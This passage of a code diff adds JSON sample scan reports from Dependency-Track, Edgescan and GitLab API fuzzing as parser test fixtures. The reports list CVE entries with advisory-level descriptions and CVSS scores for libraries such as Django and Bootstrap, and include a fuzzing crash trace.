"library", + "author": "Kenneth Reitz", + "name": "certifi", + "version": "2021.10.8", + "licenses": [ + { + "expression": "MPL-2.0" + } + ], + "purl": "pkg:pypi/certifi@2021.10.8" + } + ], + "vulnerabilities": [ + { + "bom-ref": "c7129ff8-08bc-4afe-82ec-7d97b9491741", + "id": "CVE-2021-33203", + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/c7129ff8-08bc-4afe-82ec-7d97b9491741?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "references": [ + { + "source": { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203" + } + } + ], + "ratings": [ + { + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/c7129ff8-08bc-4afe-82ec-7d97b9491741?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "score": 7.5, + "severity": "high", + "method": "CVSSv3", + "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "description": "[CVE-2021-33203] Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential ...", + "detail": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories." + }, + { + "bom-ref": "c9b6a6a5-01a4-4d4c-b480-b9d6825dc4d0", + "id": "CVE-2018-7536", + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/c9b6a6a5-01a4-4d4c-b480-b9d6825dc4d0?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "references": [ + { + "source": { + "url": "https://www.djangoproject.com/weblog/2018/mar/06/security-releases/" + } + }, + { + "source": { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7536" + } + } + ], + "ratings": [ + { + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/c9b6a6a5-01a4-4d4c-b480-b9d6825dc4d0?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "score": 5.3, + "severity": "medium", + "method": "CVSSv3", + "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "description": "[CVE-2018-7536] Incorrect Regular Expression", + "detail": "An issue was discovered in Django 2.0 before 2.0.3, 1.11 before 1.11.11, and 1.8 before 1.8.19. The django.utils.html.urlize() function was extremely slow to evaluate certain inputs due to catastrophic backtracking vulnerabilities in two regular expressions (only one regular expression for Django 1.8.x). The urlize() function is used to implement the urlize and urlizetrunc template filters, which were thus vulnerable." + }, + { + "bom-ref": "40fb7665-767b-40f5-bb08-3d0ed295cfaf", + "id": "CVE-2018-7537", + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/40fb7665-767b-40f5-bb08-3d0ed295cfaf?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "references": [ + { + "source": { + "url": "https://www.djangoproject.com/weblog/2018/mar/06/security-releases/" + } + }, + { + "source": { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7537" + } + } + ], + "ratings": [ + { + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/40fb7665-767b-40f5-bb08-3d0ed295cfaf?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "score": 5.3, + "severity": "medium", + "method": "CVSSv3", + "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "description": "[CVE-2018-7537] Incorrect Regular Expression", + "detail": "An issue was discovered in Django 2.0 before 2.0.3, 1.11 before 1.11.11, and 1.8 before 1.8.19. If django.utils.text.Truncator's chars() and words() methods were passed the html=True argument, they were extremely slow to evaluate certain inputs due to a catastrophic backtracking vulnerability in a regular expression. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which were thus vulnerable." + }, + { + "bom-ref": "87a595e6-8e97-40a3-8677-13bd76364267", + "id": "CVE-2018-14574", + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/87a595e6-8e97-40a3-8677-13bd76364267?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "references": [ + { + "source": { + "url": "https://www.djangoproject.com/weblog/2018/aug/01/security-releases/" + } + }, + { + "source": { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14574" + } + } + ], + "ratings": [ + { + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/87a595e6-8e97-40a3-8677-13bd76364267?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "score": 6.1, + "severity": "medium", + "method": "CVSSv3", + "vector": "AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "description": "[CVE-2018-14574] URL Redirection to Untrusted Site (\"Open Redirect\")", + "detail": "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect." + }, + { + "bom-ref": "4fe076be-8570-4056-beec-dd93d99543bd", + "id": "CVE-2019-3498", + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/4fe076be-8570-4056-beec-dd93d99543bd?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "references": [ + { + "source": { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3498" + } + } + ], + "ratings": [ + { + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/4fe076be-8570-4056-beec-dd93d99543bd?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "score": 6.5, + "severity": "medium", + "method": "CVSSv3", + "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "description": "[CVE-2019-3498] Improper Input Validation", + "detail": "In Django 1.11.x before 1.11.18, 2.0.x before 2.0.10, and 2.1.x before 2.1.5, an Improper Neutralization of Special Elements in Output Used by a Downstream Component issue exists in django.views.defaults.page_not_found(), leading to content spoofing (in a 404 error page) if a user fails to recognize that a crafted URL has malicious content." + }, + { + "bom-ref": "eeeaf73f-4e79-4d40-b6c1-75c75f5460a1", + "id": "CVE-2019-6975", + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/eeeaf73f-4e79-4d40-b6c1-75c75f5460a1?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "references": [ + { + "source": { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6975" + } + } + ], + "ratings": [ + { + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/eeeaf73f-4e79-4d40-b6c1-75c75f5460a1?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "score": 7.5, + "severity": "high", + "method": "CVSSv3", + "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "description": "[CVE-2019-6975] Uncontrolled Resource Consumption (\"Resource Exhaustion\")", + "detail": "Django 1.11.x before 1.11.19, 2.0.x before 2.0.11, and 2.1.x before 2.1.6 allows Uncontrolled Memory Consumption via a malicious attacker-supplied value to the django.utils.numberformat.format() function." + }, + { + "bom-ref": "90cfba6a-ddc9-4708-b131-5d875e8c558d", + "id": "CVE-2018-6188", + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/90cfba6a-ddc9-4708-b131-5d875e8c558d?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "references": [ + { + "source": { + "url": "https://www.djangoproject.com/weblog/2018/feb/01/security-releases/" + } + }, + { + "source": { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-6188" + } + } + ], + "ratings": [ + { + "source": { + "name": "Oss Index", + "url": "https://ossindex.sonatype.org/vulnerability/90cfba6a-ddc9-4708-b131-5d875e8c558d?component-type=pypi&component-name=django&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration" + }, + "score": 7.5, + "severity": "high", + "method": "CVSSv3", + "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "description": "[CVE-2018-6188] Information Exposure", + "detail": "django.contrib.auth.forms.AuthenticationForm in Django 2.0 before 2.0.2, and 1.11.8 and 1.11.9, allows remote attackers to obtain potentially sensitive information by leveraging data exposure from the confirm_login_allowed() method, as demonstrated by discovering whether a user account is inactive." + } + ] +} \ No newline at end of file diff --git a/unittests/scans/dependency_track_samples/dependency_track_3.8.0_2021-01-18.json b/unittests/scans/dependency_track_samples/dependency_track_3.8.0_2021-01-18.json new file mode 100644 index 00000000000..150e42b1426 --- /dev/null +++ b/unittests/scans/dependency_track_samples/dependency_track_3.8.0_2021-01-18.json @@ -0,0 +1,224 @@ +{ + "meta":{ + "application":"Dependency-Track", + "version":"3.8.0", + "timestamp":"2021-01-18T15:08:59Z" + }, + "findings":[ + { + "component":{ + "name":"jquery-ui", + "purl":"pkg:maven/org.webjars/jquery-ui@1.11.4?type=jar", + "uuid":"28902b39-d4cc-4072-b752-3614cf421867", + "version":"1.11.4", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"CVE-2016-7103", + "cweId":79, + "description":"Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.", + "source":"NVD", + "uuid":"9e5b0aff-f4d8-4a7a-88a8-20326d5cfbe0" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:28902b39-d4cc-4072-b752-3614cf421867:9e5b0aff-f4d8-4a7a-88a8-20326d5cfbe0" + }, + { + "component":{ + "name":"bootstrap", + "purl":"pkg:maven/org.webjars/bootstrap@3.3.6?type=jar", + "uuid":"856773f1-67e4-4e3b-b07b-c60bf8a4f364", + "version":"3.3.6", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"3e831af5-428b-4712-874f-8f6ff932e2b2", + "cweId":79, + "description":"The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "source":"OSSINDEX", + "title":"CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "uuid":"d16f59db-6cff-43fa-9941-72fe4e1c820d" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:856773f1-67e4-4e3b-b07b-c60bf8a4f364:d16f59db-6cff-43fa-9941-72fe4e1c820d" + }, + { + "component":{ + "name":"bootstrap", + "purl":"pkg:maven/org.webjars/bootstrap@3.3.6?type=jar", + "uuid":"856773f1-67e4-4e3b-b07b-c60bf8a4f364", + "version":"3.3.6", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"CVE-2016-10735", + "cweId":79, + "description":"In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute, a different vulnerability than CVE-2018-14041.", + "source":"NVD", + "uuid":"02ac4593-9aee-407d-9e2b-81d08cdf8603" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:856773f1-67e4-4e3b-b07b-c60bf8a4f364:02ac4593-9aee-407d-9e2b-81d08cdf8603" + }, + { + "component":{ + "name":"bootstrap", + "purl":"pkg:maven/org.webjars/bootstrap@3.3.6?type=jar", + "uuid":"856773f1-67e4-4e3b-b07b-c60bf8a4f364", + "version":"3.3.6", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"CVE-2018-14040", + "cweId":79, + "description":"In Bootstrap before 4.1.2, XSS is possible in the collapse data-parent attribute.", + "source":"NVD", + "uuid":"e26f418a-3833-4ded-9e57-6eb0bf86087e" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:856773f1-67e4-4e3b-b07b-c60bf8a4f364:e26f418a-3833-4ded-9e57-6eb0bf86087e" + }, + { + "component":{ + "name":"bootstrap", + "purl":"pkg:maven/org.webjars/bootstrap@3.3.6?type=jar", + "uuid":"856773f1-67e4-4e3b-b07b-c60bf8a4f364", + "version":"3.3.6", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"6dd9e321-93cd-4d79-b33a-ff7e01b15ad9", + "cweId":79, + "description":"The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "source":"OSSINDEX", + "title":"CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "uuid":"e7a95d30-9e5e-49cb-b175-7da2c4a3e42a" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:856773f1-67e4-4e3b-b07b-c60bf8a4f364:e7a95d30-9e5e-49cb-b175-7da2c4a3e42a" + }, + { + "component":{ + "name":"bootstrap", + "purl":"pkg:maven/org.webjars/bootstrap@3.3.6?type=jar", + "uuid":"856773f1-67e4-4e3b-b07b-c60bf8a4f364", + "version":"3.3.6", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"CVE-2018-20676", + "cweId":79, + "description":"In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute.", + "source":"NVD", + "uuid":"eb039a1b-443c-4e6a-8385-2063d7c93c49" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:856773f1-67e4-4e3b-b07b-c60bf8a4f364:eb039a1b-443c-4e6a-8385-2063d7c93c49" + }, + { + "component":{ + "name":"bootstrap", + "purl":"pkg:maven/org.webjars/bootstrap@3.3.6?type=jar", + "uuid":"856773f1-67e4-4e3b-b07b-c60bf8a4f364", + "version":"3.3.6", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"CVE-2018-14042", + "cweId":79, + "description":"In Bootstrap before 4.1.2, XSS is possible in the data-container property of tooltip.", + "source":"NVD", + "uuid":"e11b6826-784a-430b-8aa0-3e165eaaa03e" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:856773f1-67e4-4e3b-b07b-c60bf8a4f364:e11b6826-784a-430b-8aa0-3e165eaaa03e" + }, + { + "component":{ + "name":"bootstrap", + "purl":"pkg:maven/org.webjars/bootstrap@3.3.6?type=jar", + "uuid":"856773f1-67e4-4e3b-b07b-c60bf8a4f364", + "version":"3.3.6", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"CVE-2019-8331", + "cweId":79, + "description":"In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.", + "source":"NVD", + "uuid":"d10dbcd5-2776-46ac-b7db-e3ce25c22bd7" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:856773f1-67e4-4e3b-b07b-c60bf8a4f364:d10dbcd5-2776-46ac-b7db-e3ce25c22bd7" + }, + { + "component":{ + "name":"bootstrap", + "purl":"pkg:maven/org.webjars/bootstrap@3.3.6?type=jar", + "uuid":"856773f1-67e4-4e3b-b07b-c60bf8a4f364", + "version":"3.3.6", + "group":"org.webjars" + }, + "vulnerability":{ + "severity":"MEDIUM", + "severityRank":2, + "cweName":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "vulnId":"CVE-2018-20677", + "cweId":79, + "description":"In Bootstrap before 3.4.0, XSS is possible in the affix configuration target property.", + "source":"NVD", + "uuid":"3715d188-7fe1-49fd-99df-9f8b8204b18a" + }, + "analysis":{ + "isSuppressed":false + }, + "matrix":"cb028f91-4e76-417f-9659-f98bbdab46f1:856773f1-67e4-4e3b-b07b-c60bf8a4f364:3715d188-7fe1-49fd-99df-9f8b8204b18a" + } + ], + "project":{ + "name":"project", + "uuid":"cb028f91-4e76-417f-9659-f98bbdab46f1", + "version":"CI" + }, + "version":"1.0" +} diff --git a/unittests/scans/dependency_track_samples/many_findings.json b/unittests/scans/dependency_track_samples/many_findings.json new file mode 100644 index 00000000000..0682953f7b3 --- /dev/null +++ b/unittests/scans/dependency_track_samples/many_findings.json @@ -0,0 +1,110 @@ +{ + "version": "1.0", + "meta" : { + "application": "Dependency-Track", + "version": "3.4.0", + "timestamp": "2018-11-18T23:31:42Z", + "baseUrl": "http://dtrack.example.org" + }, + "project" : { + "uuid": "ca4f2da9-0fad-4a13-92d7-f627f3168a56", + "name": "Acme Example", + "version": "1.0", + "description": "A sample application" + }, + "findings" : [ + { + "component": { + "uuid": "b815b581-fec1-4374-a871-68862a8f8d52", + "name": "timespan", + "version": "2.3.0", + "purl": "pkg:npm/timespan@2.3.0" + }, + "vulnerability": { + "uuid": "115b80bb-46c4-41d1-9f10-8a175d4abb46", + "source": "NPM", + "vulnId": "533", + "title": "Regular Expression Denial of Service", + "subtitle": "timespan", + "severity": "LOW", + "severityRank": 3, + "cweId": 400, + "cweName": "Uncontrolled Resource Consumption ('Resource Exhaustion')", + "description": "Affected versions of `timespan`...", + "recommendation": "No direct patch is available..." + }, + "analysis": { + "state": "NOT_SET", + "isSuppressed": false + }, + "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:b815b581-fec1-4374-a871-68862a8f8d52:115b80bb-46c4-41d1-9f10-8a175d4abb46" + }, + { + "component": { + "uuid": "979f87f5-eaf5-4095-9d38-cde17bf9228e", + "name": "uglify-js", + "version": "2.4.24", + "purl": "pkg:npm/uglify-js@2.4.24" + }, + "vulnerability": { + "uuid": "701a3953-666b-4b7a-96ca-e1e6a3e1def3", + "source": "NPM", + "vulnId": "48", + "title": "Regular Expression Denial of Service", + "subtitle": "uglify-js", + "severity": "LOW", + "severityRank": 3, + "cweId": 400, + "cweName": "Uncontrolled Resource Consumption ('Resource Exhaustion')", + "description": "Versions of `uglify-js` prior to...", + "recommendation": "Update to version 2.6.0 or later." + }, + "analysis": { + "isSuppressed": false + }, + "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:979f87f5-eaf5-4095-9d38-cde17bf9228e:701a3953-666b-4b7a-96ca-e1e6a3e1def3" + }, + { + "analysis": { + "isSuppressed": false, + "state": "FALSE_POSITIVE" + }, + "component": { + "name": "actionview", + "purl": "pkg:gem/actionview@5.2.3", + "uuid": "3e52f829-3317-48c3-bde1-342c610bd223", + "version": "5.2.3" + }, + "matrix": "8d7f5fcd-210b-491d-a29e-904c2e01b281:3e52f829-3317-48c3-bde1-342c610bd223:900991f6-335a-49cb-9bf6-87b545f960ce", + "vulnerability": { + "cweId": 22, + "cweName": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", + "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", + "severity": "MEDIUM", + "severityRank": 2, + "source": "NVD", + "uuid": "900991f6-335a-49cb-9bf6-87b545f960ce", + "vulnId": "CVE-2016-2097" + } + }, + { + "analysis": { + "isSuppressed": false + }, + "component": { + "name": "actionview", + "uuid": "3e52f829-3317-48c3-bde1-342c610bd223" + }, + "matrix": "8d7f5fcd-210b-491d-a29e-904c2e01b281:3e52f829-3317-48c3-bde1-342c610bd223:900991f6-335a-49cb-9bf6-87b545f960ce", + "vulnerability": { + "cweId": 22, + "cweName": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", + "severity": "MEDIUM", + "severityRank": 2, + "source": "NVD", + "uuid": "900991f6-335a-49cb-9bf6-87b545f960ce", + "vulnId": "CVE-2016-2097" + } + } + ] +} \ No newline at end of file diff --git a/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_empty_list.json b/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_empty_list.json new file mode 100644 index 00000000000..764f6a8701d --- /dev/null +++ b/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_empty_list.json @@ -0,0 +1,16 @@ +{ + "version": "1.0", + "meta" : { + "application": "Dependency-Track", + "version": "3.4.0", + "timestamp": "2018-11-18T23:31:42Z", + "baseUrl": "http://dtrack.example.org" + }, + "project" : { + "uuid": "ca4f2da9-0fad-4a13-92d7-f627f3168a56", + "name": "Acme Example", + "version": "1.0", + "description": "A sample application" + }, + "findings" : [] +} \ No newline at end of file diff --git a/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_missing.json b/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_missing.json new file mode 100644 index 00000000000..d13f7ea24e6 --- /dev/null +++ b/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_missing.json @@ -0,0 +1,15 @@ +{ + "version": "1.0", + "meta" : { + "application": "Dependency-Track", + "version": "3.4.0", + "timestamp": "2018-11-18T23:31:42Z", + "baseUrl": "http://dtrack.example.org" + }, + "project" : { + "uuid": "ca4f2da9-0fad-4a13-92d7-f627f3168a56", + "name": "Acme Example", + "version": "1.0", + "description": "A sample application" + } +} \ No newline at end of file diff --git a/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_null.json b/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_null.json new file mode 100644 index 00000000000..74994f4ad14 --- /dev/null +++ b/unittests/scans/dependency_track_samples/no_findings_because_findings_key_is_null.json @@ -0,0 +1,16 @@ +{ + "version": "1.0", + "meta" : { + "application": "Dependency-Track", + "version": "3.4.0", + "timestamp": "2018-11-18T23:31:42Z", + "baseUrl": "http://dtrack.example.org" + }, + "project" : { + "uuid": "ca4f2da9-0fad-4a13-92d7-f627f3168a56", + "name": "Acme Example", + "version": "1.0", + "description": "A sample application" + }, + "findings" : null +} \ No newline at end of file diff --git a/unittests/scans/dependency_track_samples/one_finding.json b/unittests/scans/dependency_track_samples/one_finding.json new file mode 100644 index 00000000000..8ed4925a664 --- /dev/null +++ b/unittests/scans/dependency_track_samples/one_finding.json @@ -0,0 +1,42 @@ +{ + "version": "1.0", + "meta" : { + "application": "Dependency-Track", + "version": "3.4.0", + "timestamp": "2018-11-18T23:31:42Z", + "baseUrl": "http://dtrack.example.org" + }, + "project" : { + "uuid": "ca4f2da9-0fad-4a13-92d7-f627f3168a56", + "name": "Acme Example", + "version": "1.0", + "description": "A sample application" + }, + "findings" : [ + { + "component": { + "uuid": "b815b581-fec1-4374-a871-68862a8f8d52", + "name": "timespan", + "version": "2.3.0", + "purl": "pkg:npm/timespan@2.3.0" + }, + "vulnerability": { + "uuid": "115b80bb-46c4-41d1-9f10-8a175d4abb46", + "source": "NPM", + "vulnId": "533", + "title": "Regular Expression Denial of Service", + "subtitle": "timespan", + "severity": "LOW", + "severityRank": 3, + "cweId": 400, + "cweName": "Uncontrolled Resource Consumption ('Resource Exhaustion')", + "description": "Affected versions of `timespan`...", + "recommendation": "No direct patch is available..." + }, + "analysis": { + "state": "NOT_SET", + "isSuppressed": false + }, + "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a56:b815b581-fec1-4374-a871-68862a8f8d52:115b80bb-46c4-41d1-9f10-8a175d4abb46" + }] +} \ No newline at end of file diff --git a/unittests/scans/edgescan/many_vulns.json b/unittests/scans/edgescan/many_vulns.json new file mode 100644 index 00000000000..3e1ac161814 --- /dev/null +++ b/unittests/scans/edgescan/many_vulns.json @@ -0,0 +1,66 @@ +[ + { + "id": 21581, + "asset_id": 60, + "name": "Cross-site scripting (reflected)", + "location": "http://test.example.com", + "location_specifier_id": 1904, + "asset_name": "test_asset", + "label": "", + "status": "open", + "pci_compliance_status": "fail", + "date_opened": "2014-12-05 14:53:43 UTC", + "date_closed": null, + "risk": 1, + "severity": 4, + "threat": 5, + "layer": "application", + "remediation": "Remediation Text", + "description": "Description Text", + "cwes": [ + "CWE-75" + ], + "cves": [ + "CVE-2021-5300" + ], + "pci_exception": "none", + "pci_exception_description": null, + "pci_exception_expiry": null, + "cvss_score": 0.0, + "cvss_vector": "AV:N/AC:L/Au:N/C:N/I:N/A:N", + "cvss_version": 2, + "asset_tags": "APPROVED,Demo-Asset" + }, + { + "id": 21583, + "asset_id": 60, + "name": "Directory listing", + "location": "http://example.test.com", + "location_specifier_id": 1904, + "asset_name": "test_asset_2", + "label": "", + "status": "closed", + "pci_compliance_status": "pass", + "date_opened": "2014-09-05 14:53:43 UTC", + "date_closed": "2020-07-13 09:39:56 UTC", + "risk": 5, + "severity": 2, + "threat": 3, + "layer": "application", + "remediation": "Remediation Text 2", + "description": "Description Text 2", + "cwes": [ + "CWE-77" + ], + "cves": [ + "CVE-2021-4008" + ], + "pci_exception": "none", + "pci_exception_description": null, + "pci_exception_expiry": null, + "cvss_score": 3.7, + "cvss_vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvss_version": 3, + "asset_tags": "" + } +] \ No newline at end of file diff --git a/unittests/scans/edgescan/no_vuln.json b/unittests/scans/edgescan/no_vuln.json new file mode 100644 index 00000000000..0637a088a01 --- /dev/null +++ b/unittests/scans/edgescan/no_vuln.json @@ -0,0 +1 @@ +[] \ No newline at end of file diff --git a/unittests/scans/edgescan/one_vuln.json b/unittests/scans/edgescan/one_vuln.json new file mode 100644 index 00000000000..4e63fcbdb8e --- /dev/null +++ b/unittests/scans/edgescan/one_vuln.json @@ -0,0 +1,34 @@ +[ + { + "id": 21581, + "asset_id": 60, + "name": "Cross-site scripting (reflected)", + "location": "http://test.example.com", + "location_specifier_id": 1904, + "asset_name": "test_asset", + "label": "", + "status": "open", + "pci_compliance_status": "fail", + "date_opened": "2014-12-05 14:53:43 UTC", + "date_closed": null, + "risk": 1, + "severity": 4, + "threat": 5, + "layer": "application", + "remediation": "Remediation Text", + "description": "Description Text", + "cwes": [ + "CWE-75" + ], + "cves": [ + "CVE-2021-5300" + ], + "pci_exception": "none", + "pci_exception_description": null, + "pci_exception_expiry": null, + "cvss_score": 3.7, + "cvss_vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvss_version": 3, + "asset_tags": "APPROVED,Demo-Asset,ABC Corporate,test" + } +] \ No newline at end of file diff --git a/unittests/scans/gitlab_api_fuzzing/gitlab_api_fuzzing_1_vuln.json b/unittests/scans/gitlab_api_fuzzing/gitlab_api_fuzzing_1_vuln.json new file mode 100644 index 00000000000..2fa655c39f5 --- /dev/null +++ b/unittests/scans/gitlab_api_fuzzing/gitlab_api_fuzzing_1_vuln.json @@ -0,0 +1,46 @@ +{ + "version": "3.0", + "vulnerabilities": [ + { + "id": "c83603d0befefe01644abdda1abbfaac842fccbabfbe336db9f370386e40f702", + "category": "coverage_fuzzing", + "name": "name", + "message": "Index-out-of-range", + "cve": "", + "severity": "Low", + "scanner": { + "id": "libfuzzer", + "name": "libfuzzer" + }, + "location": { + "crash_type": "Index-out-of-range", + "crash_state": "go-fuzzing-example.ParseComplex.func6\ngo-fuzzing-example.ParseComplex\ngo-fuzzing-example.Fuzz\n", + "stacktrace_snippet": "INFO: Seed: 1156723483\nINFO: 65536 Extra Counters\nINFO: 2 files found in corpus\nINFO: 1 files found in ./seed_corpus\nINFO: -max_len is not provided; libFuzzer will not generate inputs larger than 4096 bytes\nINFO: seed corpus: files: 3 min: 1b max: 6b total: 8b rss: 38Mb\n#4\tINITED ft: 11 corp: 2/7b lim: 4 exec/s: 0 rss: 39Mb\n#32768\tpulse ft: 11 corp: 2/7b lim: 33 exec/s: 10922 rss: 39Mb\npanic: runtime error: index out of range [6] with length 6\n\ngoroutine 17 [running, locked to thread]:\ngitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example.ParseComplex.func6(...)\n\t/builds/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/parse_complex.go:5\ngitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example.ParseComplex(0x2e9a6b0, 0x6, 0x6, 0x7ffe97693e20)\n\t/builds/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/parse_complex.go:5 +0x1b8\ngitlab.com/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example.Fuzz(...)\n\t/builds/gitlab-org/security-products/demos/coverage-fuzzing/go-fuzzing-example/parse_complex_fuzz.go:6\nmain.LLVMFuzzerTestOneInput(0x2e9a6b0, 0x6, 